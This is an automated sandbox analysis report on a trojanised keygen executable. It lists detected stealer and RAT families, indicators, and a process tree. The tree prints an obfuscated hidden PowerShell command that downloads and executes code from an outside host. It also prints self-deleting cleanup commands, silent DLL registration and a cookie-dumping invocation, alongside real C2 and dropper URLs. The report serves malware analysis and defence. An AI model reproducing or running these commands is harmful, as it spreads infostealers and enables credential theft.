Analysis

  • max time kernel
    117s
  • max time network
    371s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    10-04-2021 21:05

Errors

Reason
Machine shutdown

General

  • Target

    Isunshare_Zip_Password_Genius_keygen_by_CORE.exe

  • Size

    5.3MB

  • MD5

    6d580cc51df0dbd687b66528fdc573b8

  • SHA1

    2e2c2c179fedec34578f531782d5ec2d10806f92

  • SHA256

    68c980c766e1cccaa781a8fbdc7114697ef871e1b3ecf0f8fe2912306820b3db

  • SHA512

    5520f2a71ce347ce4aefca7f2d7d771ff0fbf52fd0edf9c1a55db929012234a87ef3ae88710fffd21554069f8e5a0ffd390fd2a4186a0f66293e07ea9473ce1f

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://labsclub.com/welcome

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 18 IoCs
  • Drops file in Drivers directory 5 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 3 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks for any installed AV software in registry 1 TTPs 64 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 20 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 31 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 25 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 7 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 6 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 20 IoCs
  • Runs ping.exe 1 TTPs 7 IoCs
  • Script User-Agent 6 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SetWindowsHookEx 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:344
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
      1⤵
        PID:1028
        • C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
          C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
          2⤵
            PID:6648
          • C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
            C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
            2⤵
              PID:6340
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
            1⤵
              PID:1124
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Themes
              1⤵
                PID:1156
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                1⤵
                  PID:1872
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Browser
                  1⤵
                    PID:2912
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                    1⤵
                      PID:2604
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2592
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                      1⤵
                        PID:2484
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                        1⤵
                          PID:2448
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                          1⤵
                            PID:1400
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s SENS
                            1⤵
                              PID:1384
                            • C:\Users\Admin\AppData\Local\Temp\Isunshare_Zip_Password_Genius_keygen_by_CORE.exe
                              "C:\Users\Admin\AppData\Local\Temp\Isunshare_Zip_Password_Genius_keygen_by_CORE.exe"
                              1⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4004
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1268
                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                  keygen-pr.exe -p83fsase3Ge
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:1444
                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    • Suspicious use of WriteProcessMemory
                                    PID:3824
                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                      C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                      5⤵
                                        PID:1912
                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                    keygen-step-1.exe
                                    3⤵
                                    • Executes dropped EXE
                                    PID:3808
                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                    keygen-step-3.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of WriteProcessMemory
                                    PID:68
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                      4⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:2780
                                      • C:\Windows\SysWOW64\PING.EXE
                                        ping 1.1.1.1 -n 1 -w 3000
                                        5⤵
                                        • Runs ping.exe
                                        PID:2124
                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                    keygen-step-4.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • Checks computer location settings
                                    • Suspicious use of WriteProcessMemory
                                    PID:1512
                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of WriteProcessMemory
                                      PID:2160
                                      • C:\Users\Admin\AppData\Local\Temp\I7VD21QLL2\multitimer.exe
                                        "C:\Users\Admin\AppData\Local\Temp\I7VD21QLL2\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                                        5⤵
                                        • Executes dropped EXE
                                        • Maps connected drives based on registry
                                        • Drops file in Windows directory
                                        • Enumerates system info in registry
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1824
                                        • C:\Users\Admin\AppData\Local\Temp\I7VD21QLL2\multitimer.exe
                                          "C:\Users\Admin\AppData\Local\Temp\I7VD21QLL2\multitimer.exe" 1 3.1618088770.60721342e66d0 101
                                          6⤵
                                            PID:4400
                                            • C:\Users\Admin\AppData\Local\Temp\I7VD21QLL2\multitimer.exe
                                              "C:\Users\Admin\AppData\Local\Temp\I7VD21QLL2\multitimer.exe" 2 3.1618088770.60721342e66d0
                                              7⤵
                                              • Executes dropped EXE
                                              • Checks for any installed AV software in registry
                                              PID:4704
                                              • C:\Users\Admin\AppData\Local\Temp\kn5otl15dgs\jnve2qk4szf.exe
                                                "C:\Users\Admin\AppData\Local\Temp\kn5otl15dgs\jnve2qk4szf.exe" /VERYSILENT
                                                8⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetWindowsHookEx
                                                PID:588
                                                • C:\Users\Admin\AppData\Local\Temp\is-JF2A0.tmp\jnve2qk4szf.tmp
                                                  "C:\Users\Admin\AppData\Local\Temp\is-JF2A0.tmp\jnve2qk4szf.tmp" /SL5="$30246,140785,56832,C:\Users\Admin\AppData\Local\Temp\kn5otl15dgs\jnve2qk4szf.exe" /VERYSILENT
                                                  9⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of FindShellTrayWindow
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:4512
                                                  • C:\Users\Admin\AppData\Local\Temp\is-VEAT2.tmp\apipostback.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\is-VEAT2.tmp\apipostback.exe" adan adan
                                                    10⤵
                                                    • Executes dropped EXE
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:5404
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\eOoe4D2YS.dll"
                                                      11⤵
                                                        PID:6940
                                                        • C:\Windows\SysWOW64\regsvr32.exe
                                                          regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\eOoe4D2YS.dll"
                                                          12⤵
                                                          • Loads dropped DLL
                                                          PID:5660
                                                          • C:\Windows\system32\regsvr32.exe
                                                            /s "C:\Users\Admin\AppData\Local\Temp\eOoe4D2YS.dll"
                                                            13⤵
                                                            • Loads dropped DLL
                                                            PID:3864
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\eOoe4D2YS.dll0JxH18EQW.dll"
                                                        11⤵
                                                          PID:2300
                                                          • C:\Windows\SysWOW64\regsvr32.exe
                                                            regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\eOoe4D2YS.dll0JxH18EQW.dll"
                                                            12⤵
                                                              PID:2188
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                            11⤵
                                                              PID:4472
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                12⤵
                                                                • Blocklisted process makes network request
                                                                PID:8892
                                                      • C:\Users\Admin\AppData\Local\Temp\5hflz34nbuv\KiffApp1.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\5hflz34nbuv\KiffApp1.exe"
                                                        8⤵
                                                        • Executes dropped EXE
                                                        PID:4944
                                                      • C:\Users\Admin\AppData\Local\Temp\4kap1z2zif2\fqacravoy5h.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\4kap1z2zif2\fqacravoy5h.exe"
                                                        8⤵
                                                          PID:2184
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\4kap1z2zif2\fqacravoy5h.exe"
                                                            9⤵
                                                              PID:5656
                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                ping 1.1.1.1 -n 1 -w 3000
                                                                10⤵
                                                                • Runs ping.exe
                                                                PID:5948
                                                          • C:\Users\Admin\AppData\Local\Temp\gekn0g35bry\Setup3310.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\gekn0g35bry\Setup3310.exe" /Verysilent /subid=577
                                                            8⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:4984
                                                            • C:\Users\Admin\AppData\Local\Temp\is-Q3I42.tmp\Setup3310.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-Q3I42.tmp\Setup3310.tmp" /SL5="$20358,138429,56832,C:\Users\Admin\AppData\Local\Temp\gekn0g35bry\Setup3310.exe" /Verysilent /subid=577
                                                              9⤵
                                                                PID:5220
                                                                • C:\Users\Admin\AppData\Local\Temp\is-MAO39.tmp\Setup.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-MAO39.tmp\Setup.exe" /Verysilent
                                                                  10⤵
                                                                  • Executes dropped EXE
                                                                  • Drops file in Program Files directory
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:5948
                                                                  • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe
                                                                    "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe"
                                                                    11⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:6148
                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      12⤵
                                                                        PID:6776
                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        12⤵
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:6676
                                                                    • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe
                                                                      "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe"
                                                                      11⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:6184
                                                                      • C:\Users\Admin\AppData\Roaming\Programma configurater\viqconf.exe
                                                                        "C:\Users\Admin\AppData\Roaming\Programma configurater\viqconf.exe"
                                                                        12⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:5656
                                                                        • C:\Users\Admin\AppData\Roaming\Programma configurater\viqconf.exe
                                                                          "C:\Users\Admin\AppData\Roaming\Programma configurater\viqconf.exe"
                                                                          13⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Checks processor information in registry
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:6276
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im viqconf.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Roaming\Programma configurater\viqconf.exe" & del C:\ProgramData\*.dll & exit
                                                                            14⤵
                                                                              PID:6292
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /im viqconf.exe /f
                                                                                15⤵
                                                                                • Drops file in Windows directory
                                                                                • Kills process with taskkill
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:6032
                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                timeout /t 6
                                                                                15⤵
                                                                                • Delays execution with timeout.exe
                                                                                PID:7280
                                                                      • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe
                                                                        "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe"
                                                                        11⤵
                                                                        • Executes dropped EXE
                                                                        • Checks whether UAC is enabled
                                                                        • Drops file in Program Files directory
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:6220
                                                                      • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe
                                                                        "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe"
                                                                        11⤵
                                                                        • Executes dropped EXE
                                                                        PID:6268
                                                                        • C:\Users\Admin\AppData\Local\Temp\8JUG495J2Q\multitimer.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\8JUG495J2Q\multitimer.exe" 0 306065bb10421b26.04333812 0 103
                                                                          12⤵
                                                                          • Executes dropped EXE
                                                                          • Drops file in Windows directory
                                                                          PID:6656
                                                                          • C:\Users\Admin\AppData\Local\Temp\8JUG495J2Q\multitimer.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\8JUG495J2Q\multitimer.exe" 1 3.1618088807.607213672ddb1 103
                                                                            13⤵
                                                                            • Adds Run key to start application
                                                                            PID:6560
                                                                            • C:\Users\Admin\AppData\Local\Temp\8JUG495J2Q\multitimer.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\8JUG495J2Q\multitimer.exe" 2 3.1618088807.607213672ddb1
                                                                              14⤵
                                                                              • Checks for any installed AV software in registry
                                                                              PID:5944
                                                                              • C:\Users\Admin\AppData\Local\Temp\eyghkhck0ps\gw1cwkzh5uz.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\eyghkhck0ps\gw1cwkzh5uz.exe" /ustwo INSTALL
                                                                                15⤵
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:6140
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6140 -s 652
                                                                                  16⤵
                                                                                  • Program crash
                                                                                  PID:7552
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6140 -s 668
                                                                                  16⤵
                                                                                  • Program crash
                                                                                  PID:8384
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6140 -s 712
                                                                                  16⤵
                                                                                  • Program crash
                                                                                  PID:6848
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6140 -s 732
                                                                                  16⤵
                                                                                  • Program crash
                                                                                  PID:6616
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6140 -s 884
                                                                                  16⤵
                                                                                  • Program crash
                                                                                  PID:5584
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6140 -s 932
                                                                                  16⤵
                                                                                  • Program crash
                                                                                  PID:5676
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6140 -s 1096
                                                                                  16⤵
                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                  • Program crash
                                                                                  PID:7460
                                                                              • C:\Users\Admin\AppData\Local\Temp\odtbmfvhrxb\Setup3310.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\odtbmfvhrxb\Setup3310.exe" /Verysilent /subid=577
                                                                                15⤵
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:5400
                                                                                • C:\Users\Admin\AppData\Local\Temp\is-JSG8V.tmp\Setup3310.tmp
                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-JSG8V.tmp\Setup3310.tmp" /SL5="$40318,138429,56832,C:\Users\Admin\AppData\Local\Temp\odtbmfvhrxb\Setup3310.exe" /Verysilent /subid=577
                                                                                  16⤵
                                                                                  • Loads dropped DLL
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:6412
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-VKPC3.tmp\Setup.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-VKPC3.tmp\Setup.exe" /Verysilent
                                                                                    17⤵
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:7176
                                                                              • C:\Users\Admin\AppData\Local\Temp\syj13zlqg35\app.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\syj13zlqg35\app.exe" /8-23
                                                                                15⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:2184
                                                                                • C:\Users\Admin\AppData\Local\Temp\syj13zlqg35\app.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\syj13zlqg35\app.exe" /8-23
                                                                                  16⤵
                                                                                    PID:7552
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 796
                                                                                    16⤵
                                                                                    • Program crash
                                                                                    PID:7988
                                                                                • C:\Users\Admin\AppData\Local\Temp\fcqllxudjwx\vpn.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\fcqllxudjwx\vpn.exe" /silent /subid=482
                                                                                  15⤵
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:5588
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-FRD8L.tmp\vpn.tmp
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-FRD8L.tmp\vpn.tmp" /SL5="$2050A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\fcqllxudjwx\vpn.exe" /silent /subid=482
                                                                                    16⤵
                                                                                      PID:4208
                                                                            • C:\Users\Admin\AppData\Local\Temp\WMH6HSMTZW\setups.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\WMH6HSMTZW\setups.exe" ll
                                                                              12⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:7088
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-S3NGA.tmp\setups.tmp
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-S3NGA.tmp\setups.tmp" /SL5="$8006A,2051888,270336,C:\Users\Admin\AppData\Local\Temp\WMH6HSMTZW\setups.exe" ll
                                                                                13⤵
                                                                                • Executes dropped EXE
                                                                                • Checks computer location settings
                                                                                • Loads dropped DLL
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:7128
                                                                          • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe
                                                                            "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"
                                                                            11⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:6312
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-K21T1.tmp\LabPicV3.tmp
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-K21T1.tmp\LabPicV3.tmp" /SL5="$30412,136934,53248,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"
                                                                              12⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:6452
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-BPJJ5.tmp\alpATCHInO.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-BPJJ5.tmp\alpATCHInO.exe" /S /UID=lab214
                                                                                13⤵
                                                                                • Drops file in Drivers directory
                                                                                • Executes dropped EXE
                                                                                • Adds Run key to start application
                                                                                • Drops file in Program Files directory
                                                                                PID:7092
                                                                                • C:\Program Files\Windows Security\LWFOXARVVC\prolab.exe
                                                                                  "C:\Program Files\Windows Security\LWFOXARVVC\prolab.exe" /VERYSILENT
                                                                                  14⤵
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:4484
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-G1UEN.tmp\prolab.tmp
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-G1UEN.tmp\prolab.tmp" /SL5="$50516,575243,216576,C:\Program Files\Windows Security\LWFOXARVVC\prolab.exe" /VERYSILENT
                                                                                    15⤵
                                                                                    • Drops file in Program Files directory
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:4436
                                                                                • C:\Users\Admin\AppData\Local\Temp\99-89921-33e-7648b-9030d4243a1c3\Daevalosuri.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\99-89921-33e-7648b-9030d4243a1c3\Daevalosuri.exe"
                                                                                  14⤵
                                                                                  • Checks computer location settings
                                                                                  PID:4816
                                                                                • C:\Users\Admin\AppData\Local\Temp\74-58739-432-6cab0-fc15e34d6b102\Kyjejaewawu.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\74-58739-432-6cab0-fc15e34d6b102\Kyjejaewawu.exe"
                                                                                  14⤵
                                                                                    PID:2132
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5vayxegi.hnr\gaooo.exe & exit
                                                                                      15⤵
                                                                                        PID:3820
                                                                                        • C:\Users\Admin\AppData\Local\Temp\5vayxegi.hnr\gaooo.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\5vayxegi.hnr\gaooo.exe
                                                                                          16⤵
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:7308
                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            17⤵
                                                                                              PID:7604
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              17⤵
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:4788
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yydpprkg.yxd\jg8_8qyu.exe & exit
                                                                                          15⤵
                                                                                            PID:6856
                                                                                            • C:\Users\Admin\AppData\Local\Temp\yydpprkg.yxd\jg8_8qyu.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\yydpprkg.yxd\jg8_8qyu.exe
                                                                                              16⤵
                                                                                              • Checks whether UAC is enabled
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:7780
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ptowy0b.suh\google-game.exe & exit
                                                                                            15⤵
                                                                                              PID:5528
                                                                                              • C:\Users\Admin\AppData\Local\Temp\5ptowy0b.suh\google-game.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\5ptowy0b.suh\google-game.exe
                                                                                                16⤵
                                                                                                • Drops file in Program Files directory
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:5852
                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                  17⤵
                                                                                                  • Modifies registry class
                                                                                                  PID:5408
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3azcvh5x.ir0\BarSetpFile.exe /silent & exit
                                                                                              15⤵
                                                                                                PID:8828
                                                                                                • C:\Users\Admin\AppData\Local\Temp\3azcvh5x.ir0\BarSetpFile.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\3azcvh5x.ir0\BarSetpFile.exe /silent
                                                                                                  16⤵
                                                                                                    PID:8904
